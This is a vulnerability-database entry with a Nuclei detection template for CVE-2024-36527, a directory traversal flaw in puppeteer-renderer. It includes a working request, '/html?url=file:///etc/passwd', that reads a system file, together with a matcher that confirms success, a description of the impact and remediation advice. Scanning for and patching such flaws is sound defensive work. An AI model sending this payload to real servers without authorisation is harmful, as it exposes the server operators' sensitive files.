Puppeteer Renderer - Directory Traversal

2024-06-2405:40:04

ProjectDiscovery

github.com

puppeteer renderer

directory traversal

cve2024

sensitive information

update version.

7.2 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

22.0%

JSON

id: CVE-2024-36527

info:
  name: Puppeteer Renderer  - Directory Traversal
  author: Stux
  severity: medium
  description: |
    puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information.
  remediation: |
    Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols.
  reference:
    - https://github.com/zenato/puppeteer-renderer/issues/97
    - https://gist.github.com/7a6163/25fef08f75eed219c8ca21e332d6e911
  metadata:
    max-request: 1
    verified: true
  tags: cve,cve2024,puppeteer-renderer

http:
  - method: GET
    path:
      - "{{BaseURL}}/html?url=file:///etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022013c982e61cebb23f2b135c2c6217fc117c36dd1f7319f5c9a4ddb1c29b4b1dfd022100c1592cd46ccdc9192bec332e0170e09c5eb0dff7288f54f82bab302a9da281cd:922c64590222798bb761d5b6d8e72950